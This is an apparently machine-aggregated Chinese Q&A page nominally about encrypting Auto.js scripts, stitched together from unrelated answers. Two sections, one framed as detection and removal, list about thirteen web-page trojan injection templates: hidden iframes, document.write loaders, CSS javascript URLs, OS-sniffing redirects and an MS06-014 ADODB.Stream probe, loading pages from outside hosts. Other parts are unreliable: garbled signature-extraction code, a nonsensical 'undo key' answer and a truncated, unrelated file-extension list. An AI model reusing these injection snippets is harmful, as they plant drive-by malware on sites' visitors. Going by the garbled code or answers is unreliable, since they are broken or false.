導航:首頁 > 文檔加密 > autojs源文件加密

autojs源文件加密

發布時間:2025-03-01 21:44:40

A. 如何進行網站掛馬檢測與清除

掛馬是常見的對網站和客戶都影響巨大的危害之一。如果是在訪問出來的源文件的頭上,或是最後有被加代碼,這個一般是網站文件被要改了,或是ARP,如果是源文件的很多數據位置(中間),那一般是資料庫被人掛了。伺服器上首先要安裝防病毒軟體,而且要保持在線病毒庫的更新,本人推薦使用eset nod32殺毒軟體,效果不錯,監測查殺木馬很及時,一般如果伺服器上的網頁里被掛馬了,一般都會檢測出來。
不完全統計,90%的網站都被掛過馬,掛馬是指在獲取網站或者網站伺服器的部分或者全部許可權後,在網頁文件中插入一段惡意代碼,這些惡意代碼主要是一些包括IE等漏洞利用代碼,用戶訪問被掛馬的頁面時,如果系統沒有更新惡意代碼中利用的漏洞補丁,則會執行惡意代碼程序,進行盜號等危險超過。目前掛馬主要是為了商業利益,有的掛馬是為了賺取流量,有的是為了盜取游戲等賬號,也有的是為了好玩,不管是處於那種目的,對於訪問被掛馬的網站來說都是一種潛在的威脅,影響運營網站公司形象。
一:框架掛馬
<iframe src=地址 width=0 height=0></iframe>
二:js文件掛馬
首先將以下代碼
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存為xxx.js,
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>
三:js變形加密
<SCRIPT language="JScript.Encode" src=http://www.softxp.net/muma.txt></script>
muma.txt可改成任意後綴
四:body掛馬
<body onload="window.location='地址';"></body>
五:隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe
src="http://www.softxp.net/muma.htm/"></iframe>';
六:css中掛馬
body {
background-image: url('javascript:document.write("<script
src=http://www.softxp.net/muma.js></script>")')}
七:JAJA掛馬
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro
llbars=no,width=1,height=1");
</script>
八:圖片偽裝
<html>
<iframe src="網馬地址" height=0 width=0></iframe>
<img src="圖片地址"></center>
</html>
九:偽裝調用:
<frameset rows="444,0" cols="*">
<frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高級欺騙
<a href="http://www.softbar.com(迷惑連接地址,顯示這個地址指向木馬地址)" onMouseOver="www_softbar_com();
return true;"> 頁面要顯示的內容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="網馬地址";
open
(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizabl
e=no,history=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
十一:判斷系統代碼
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>
十二:判斷是否有ms06014代碼
<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=http://www.softxp.net width=100% height=100% scrolling=no frameborder=0>")
else
document.write ("<iframe src=http://www.softxp.net width=100% height=100% scrolling=no frameborder=0>")
end if
</script>
十三:智能讀取js的代碼demo
//讀娶src的對象
var v = document.getElementById("advjs");
//讀娶src的參數
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));
document.write("<iframe src=\"http://www.softxp.net/1/"+u_num+".htm\" width=\"0\" height=\"0\"
frameborder=\"0\"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/www.softxp.net\/demo.js\')\">");
document.writeln("<DIV ");
document.writeln("style=\"CURSOR: url(\'http:\/\/www.softxp.net\/demo.js\')\"><\/DIV><\/DIV><
\/BODY><\/HTML>")
//分析src的參數函數
function getUrlParameterAdv(asName,lsURL){
loU = lsURL.split("?");
if (loU.length>1){
var loallPm = loU[1].split("&");
for (var i=0; i<loallPm.length; i++){
var loPm = loallPm.split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;
}

B. autojs如何查看簽名密碼

跳過/*** 獲取應用的簽名密碼
*/function getCertificateSHA1Fingerprint() { //獲取包管理器 let pm = context.getPackageManager()//獲取當前要獲取 SHA包名,也可以用其他的包名,但需要注意, //在用其他包名的前提是,此方法傳遞的參數 Context 應該是對應包tpackageName=context.getPackageName(); //返回包括在包中的簽名信息let flags = PackageManager.GET_SIGNATURES; //獲得包的所有內容信類 let packageInfo = .getPackageInfo(packageName, flags); //簽名信息 let signatures = packageInfo.signatures;et cert = signatures[0].toByteArray()//將名轉換為位元組數組流et inpunewteArrayInputStream(cert); //證書工廠類,這個類實現了出廠合格證演算法的功letcf=CertificateFactory.getInstance("X509"); //X509 證書,X.509 是一種非常通用的證書格式let c = cf.generateCertificate(input);//加密演算法的類,這里的參數可以使 MD4,MD5 等加密演算法let md = MessageDigest.getInstance("SHA1");//獲得公鑰let publicKey = md.digest(c.getEncoded()); //位元組到十六進制的格式轉換 let hexString = byte2HexFormatted(publicKey); return hexString;//這里是將獲取到編碼進行16 進制轉換function byte2HexFormatted(arr) { let str = new StringBuilder(arr.length * 2); for (let i = 0; i < arr.length; i++) { let h = Integer.toHexString(arr[i]); et l = h.length if (l == 1) h = "0" + h; if (l > 2) h = h.substring(l - 2, l); str.append(h.toUpperCase()) if (i < arr.length - 1)str.append(":"); } return str.toString();}

C. auto.js用什麼加的密

使用js混淆加密和庖丁。
Auto.js已推出,有更強的加密、專業級調試等功能,訪問官網獲取。

D. 請教文件後綴的代表意思!~

以下不是我原創的。

常見的文件後綴名
.ACA:Microsoft的代理使用的角色文檔
.acf:系統管理配置
.acm:音頻壓縮管理驅動程序,為Windows系統提供各種聲音格式的編碼和解碼功能
.aif:聲音文件,支持壓縮,可以使用Windows Media Player和QuickTime Player播放
.AIF:音頻文件,使用Windows Media Player播放
.AIFC:音頻文件,使用Windows Media Player播放
.AIFF:音頻文件,使用Windows Media Player播放
.ani:動畫游標文件擴展名,例如動畫沙漏。
.ans:ASCII字元圖形動畫文件
.arc:一種較早的壓縮文件,可以使用WinZip,WinRAR,PKARC等軟體打開
.arj:壓縮文件。可以使用WinZip,WinRAR,PKARC等軟體打開
.asf:微軟的媒體播放器支持的視頻流,可以使用Windows Media Player播放
.asp:微軟的視頻流文件,可以使用Windows Media Player打開
.asp:微軟提出的Active Server Page,是伺服器端腳本,常用於大型網站開發,支持資料庫連接,類似PHP。可以使用Visual InterDev編寫,是目前的大熱門
.asx:Windows Media 媒體文件的快捷方式
.au:是Internet中常用的聲音文件格式,多由Sun工作站創建,可使用軟體Waveform Hold and Modify 播放。Netscape Navigator中的LiveAudio也可以播放.au文件
.avi:一種使用Microsoft RIFF規范的Windows多媒體文件格式,用於存儲聲音和移動的圖片
.bak:備份文件,一般是被自動或是通過命令創建的輔助文件,它包含某個文件的最近一個版本,並且具有於該文件相同的文件名

.bas Basic:語言源程序文件,可編譯成可執行文件,目前使用Basic開發系統的是Visual Basic

.bat:批處理文件,在MS-DOS中,.bat文件是可執行文件,有一系列命令構成,其中可以包含對其他程序的調用

.bbs:電子告示板系統文章信息文件

.bfc:Windows的公文包文件

.bin:二進制文件,其用途依系統或應用而定

.bmp:Bitmap點陣圖文件,這是微軟公司開發Paint的自身格式,可以被多種Windows和Windows NT平台及許多應用程序支持,支持32位顏色,用於為Windows界面創建圖標的資源文件格式。

.c:C語言源程序文件,在C語言編譯程序下編譯使用

.cab:Microsoft制訂的壓縮包格式,常用於軟體的安裝程序,使用Windows自帶的實用程序,Extract.exe可以對其解壓縮,WinZip,WinRAR等都支持這種格式

.cal:Windows 中的日歷文件

.cdf:Internet Explorer的頻道文件

.cdr:CorelDraw中的一種圖形文件格式,它是所有CorelDraw應用程序中均能夠使用的一種圖形圖像文件格式

.cdx:索引文件,存在於Dbase,Foxbase,Foxpro系統軟體環境下

.cfg:配置文件,系統或應用軟體用於進行配置自己功能,特性的文件

.chm:編譯過後的HTML文件,常用於製作幫助文件和電子文檔

.clp:在Windows下剪貼板中的文件格式

.cmd:用於Windows NT/2000的批處理文件,其實與BAT文件功能相同,只是為了與DOS/Windows 9x下的BAT有所區別

.cmf:音效卡標準的音樂文件,FM合成器等可以回放

.cnf:NetMeetting會議連接文件

.cnt:聯機幫助文件目錄索引文件,通常和同名的.hlp文件一起保存

.col:由Autodesk Animator,Autodesk Animator Por等程序創建的一種調色板文件格式,其中存儲的是調色板中各種項目的RGB值

.com:DOS可執行命令文件,一般小於64KB

.cpl:控制面板擴展文件,Windows操作系統使用

.cpp:C++語言源程序,非常強大的語言,在各種平台中都有相應的開發系統
.crd:Windows中的卡片文件
.crt:用於安全方面的證書認證文件
.cur:Windows下的游標資源文件格式,可用游標編輯軟體編輯
.css:Text/css文件

.dat:數據文件,在應用程序中使用
.dat:VCD中的圖象聲音文件,VCD播放軟體可調用,或是通過VCD機播放
.dbf:資料庫文件,Foxbase,Dbase,Visual FoxPro,等資料庫處理系統所產生的資料庫文件

.dcx:傳真瀏覽文檔文件
.ddi:映象文件,DUP,HD,IMG等工具可展開
.dev:設備驅動程序
.dib:設備無關點陣圖文件,這是一種文件格式,其目的是為了保證用某個應用程序創建的點陣圖圖形可以被其它應用程序裝載或顯示一樣

.dir:目錄文件

.dll:Windows動態連接庫,幾乎無處不在,但有時由於不同版本DLL沖突會造成敗各種各樣的問踢

.doc:是目前市場佔有率最高的辦公室軟體Microsoft Office中的字處理軟體Word創建的文檔

.dos:Windows保留的MS-DOS的某些系統文件

.dot:Microsoft Word的文檔模板文件,通過模板可以簡化一些常用格式文檔的創建工作,而且可以內嵌VBA程序來實現某些自動化功能

.drv:設備驅動程序文件,用在各種系統中

.dwg:AutoCAD的圖紙文件,也是許多繪圖軟體都支持的格式,常用於共享數據

.dxb:AutoCAD創建的一中圖形文件格式

.dxf:圖形交換格式,一種計算機輔助設計的文件格式,最初開發用來與AutoCAD一起使用,以便於圖形文件在應用程序之間的傳遞,它以ASCII方式儲存圖形,在表現圖形的大小方面十分精確

.der:Certiticate文件

.dic:Txt文件

.emf:由Microsoft公司開發的Windows 32位擴展圖元文件格式,其總體設計目標是要彌補在Microsoft Windows 3.1(Win16)中用的*.wmf文件格式的不足,使得圖元文件更加易於使用

.eps:用PostScript語言描述的一種圖形文件格式,以文本文件保存,在PostScript圖形列印機上能列印出高品質的圖形圖象,最高能表示32點陣圖形圖象

.err:編譯錯誤文件,存在於Dbase,Foxbase,Foxpro系列軟體環境下
.exe:可執行文件,雖然後綴名相同,但具有不同的格式和版本
.exp:3DS使用的顯示卡驅動程序
.exc:Txt文件

.flc:Autodesk Animator和Animatorpro的動畫文件,支持256色,最大的圖象象索是64000*64000,支持壓縮,廣泛用於動畫圖形中的動畫序列,計算機輔助設計和計算機游戲應用程序

.fnd:保存的搜索結果
.fon:點陣字型檔文件
.for:Fortran語言程序
.fot:指向字體的快捷鍵
.fp: 配置文件,存在於Dbase,Foxbase,Foxpro系列軟體的環境下
.fpt:備注欄位文件,存在於Dbase,Foxbase,Foxpro系列軟體的環境下
.frt:報表文件,存在於Dbase,Foxbase,Foxpro系列軟體的環境下
.frx:報表文件,存在於Dbase,Foxbase,Foxpro系列軟體的環境下
.fxp:編譯後的程序,存在於Dbase,Foxbase,Foxpro系列軟體的環境下

.gif:在各種平台的各種圖形處理軟體上均能夠處理的,經過壓縮的一種圖形文件格式

.grh:方正公司的圖象排版文件
.grp:Windows下的程序管理器產生的組窗口文件
.goc:Gocserve
.gra:MSGraph.Chart.5
.h: C語言源程序頭文件
.hlp:Windows應用程序幫助文件

.hqx:Macintosh中使用BinHex將二進制文件編碼為7位的文本文件,大多數Macintosh文件皆以.hqx出現(.bin極少使用),在Macintosh中,可使用StuffIt Expander對.hqx解碼,在Windows中可使用BinHex 13解碼

.ht: 超級終端

.htm:保存超文本描述語言的文本文件,用於描述各種各樣的網頁,使用各種瀏覽器打開

.html:同.htm文件
.icm:圖象配色描述文件

.ico:Windows中的圖標文件,可以包含同一個圖標的多種格式,使用圖標編輯軟體創建

.idf:MIDI樂器定義
.idx:索引文件,存在於Dbase,Foxbase,Foxpro系列軟體的環境下

.iff:文件交換格式文件,這種文件格式多用於Amiga平台,在這種平台上它幾乎可以存儲各種類型的數據,在其它平台上,IFF文件格式多用於存儲圖象和聲音文件

.image:MAcintosh磁碟映象文件,常見於萍果機的FTP網點,在Macintosh中由Shrink Wrap處理

.ime:Windows下的輸入法文件

.img:磁碟映象文件,用HD-COPY,WinImage等工具打開後可以恢復到一張磁碟上

.inc:匯編語言包含文件,類似C/C++中的.H文件

.inf:Windows下的軟體安裝信息,Windows的標准安裝程序根據此文件內的安裝信息對軟體,驅動程序等進行安裝

.ini:Windows中的初始化信息文件,已經用的不多了,新的應用程序將設置保存在系統的注冊表中

.jar:一種壓縮文件,ARJ的新版本,不過不太流行,可以使用WinJar,Winrar等打開

.jpeg:一種圖片壓縮文件,同.jpg
.jpg:靜態圖象專家組制訂的靜態圖象壓縮標准,具有很高的壓縮比,使用非常廣泛,可使用PhotoShop等圖象處理軟體創建
.lnk:快捷方式,這個文件指向另一個文件,開始菜單的程序文件夾下每條項目都是一個LNK文件
.log:日誌文件,通常用來記錄一些事件之類
.lzh:一種古老的壓縮文件,可以使用WinRAR打開
.mac:Macintosh中使用的一中灰度圖形文件格式,在Macintosh Paintbrush中使用,其解析度只能是720*567
.mag :圖形文件格式
.mdb :Microsoft Access使用的資料庫格式,是非常流行的桌面資料庫
.men :內存應用文件,存在於Dbase,Foxbase,Foxpro系列軟體的環境下
.mid :音頻壓縮文件,曾經非常流行,不過在現在的軟體中用的很少了
rle :一種壓縮過的點陣圖文件格式,RLE壓縮方案是一種極其成熟的壓縮方案,特點是無損失壓縮,既節省了磁碟空間又不損失任何圖像數據,但在打開這種壓縮文件時,要花費更多時間,此外,一些兼容性不太好的應用程序可能會搭不開
.rm :Windows下的RealPlayer所支持的視頻壓縮文件,網上非常流行的流式視頻文件,很多實時視頻新聞等都是採用這種格式的,不過,最新的Windows Media Video V8已經對其發起了強大的攻勢
.rmi :MIDI音序文件
.rtf :豐富文本格式文件,以純文本描述內容,能夠保存各種格式信息,可以用寫字版,Word等創建
.sav :存檔文件
.scp :用於Windows系統中Internet撥號用戶,自動撥號登錄用的腳本文件,可避免手動登錄時繁瑣的鍵盤輸入
.scr :屏障保護文件
.sct :屏幕文件
.scx :屏幕文件
.set :Microsoft備份集文件,用於保存要備份的內容,設置等信息
.shb :指向一個文檔的快捷方式
.snd :Mac聲音文件,Apple計算機公司開發的聲音文件格式,被Macintosh平台和多種Macintosh應用程序所支持,支持某些壓縮
.sql:查詢文件,在Dbase,Foxbase,Foxpro系列軟體的環境下使用
.svg :SVG可以算是目前最火熱的圖像文件格式了,它是基於XML由WorldWideWebConsortium聯盟開發的,SVG是可縮放的矢量圖形
.svx :Amiga聲音文件,Commodore所開發的聲音文件格式,被Amiga平台和應用程序所支持,不支持壓縮
.swf :flash是Micromedia公司的產品,嚴格說它是一種動畫編輯軟體,實際上它是製作出一種後綴名為.swf的動畫,這種格式的動畫能用比較小的體積來表現豐富的多媒體形式,並且還可以與HTML文件達到一種"水乳交融"的境界
.swg:虛擬內存交換文件,由操作系統使用
.sys:系統文件,驅動程序等,在不同的

E. autojspro的dex加密怎麼還原

autojspro的dex加密還原用撤銷鍵。根據查詢相關內容得知,autojspro的dex加密後,可直接用撤銷鍵完成還原,若autojspro的dex加密已保存,就不能實現還原功能了。

F. 常見網頁病毒的源代碼

掛馬代碼如下
一:框架掛馬

<iframe src=地址 width=0 height=0></iframe>

二:js文件掛馬

首先將以下代碼
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存為xxx.js,
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>

三:js變形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意後綴
四:body掛馬

<body onload="window.location='地址';"></body>

五:隱蔽掛馬

top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.caminix.cn"></iframe>';

六:css中掛馬

body {
background-image: url('javascript:document.write("<script src=http://www.caminix.cn></script>")')}

七:JAJA掛馬

<SCRIPT language=javascript>
window.open ("http://www.caminix.cn","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

八:圖片偽裝

<html>
<iframe src="網馬地址" height=0 width=0></iframe>
<img src="圖片地址"></center>
</html>

九:偽裝調用:

<frameset rows="444,0" cols="*">
<frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十:高級欺騙

<a href="http://www.163.com" onMouseOver="www_163_com(); return true;"></a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="http://www.caminix.cn";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,history=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

G. Hook逆向離線加密的autojs打包的腳本

牙叔教程 簡單易懂

雷電模擬器Android版本: 7.1.2

Android Studio版本: 4.1.2

jadx-gui版本: 1.2.0

腳本打包使用離線加密的時候, javascript腳本本身應該先 混淆 一遍, 然後再用離線打包,

或者, 直接使用自帶的 離線Dex加密 或者 離線Snapshot加密

思路是最重要的, 其他的網路, bing, stackoverflow, 安卓文檔, autojs文檔, 最後才是群里問問
--- 牙叔教程

部分內容來自網路
本教程僅用於學習, 禁止用於其他用途

閱讀全文

與autojs源文件加密相關的資料

熱點內容
在人壽app上怎麼報銷 瀏覽:924
linux啟動sh腳本 瀏覽:975
江蘇雲手機伺服器託管雲空間 瀏覽:24
大眾app下單怎麼退款 瀏覽:642
通報文件為什麼要加密 瀏覽:293
抗干擾單片機 瀏覽:839
編譯完pac後怎麼編譯ota 瀏覽:624
java入門教程pdf 瀏覽:73
我的世界java版怎麼找伺服器 瀏覽:691
dna可以用模擬編譯嗎 瀏覽:110
文件夾怎麼按後兩位數排序 瀏覽:55
凍結app了怎麼辦 瀏覽:711
css取消編譯後自動下載 瀏覽:472
做Ug編程需要有加工中心基礎嗎 瀏覽:684
android英語詞典 瀏覽:8
耳機有一邊連不上怎麼辦安卓 瀏覽:157
安卓怎麼玩正版孤膽車神 瀏覽:889
不做程序員還能做什麼 瀏覽:692
excel條件命令 瀏覽:407
autojs源文件加密 瀏覽:187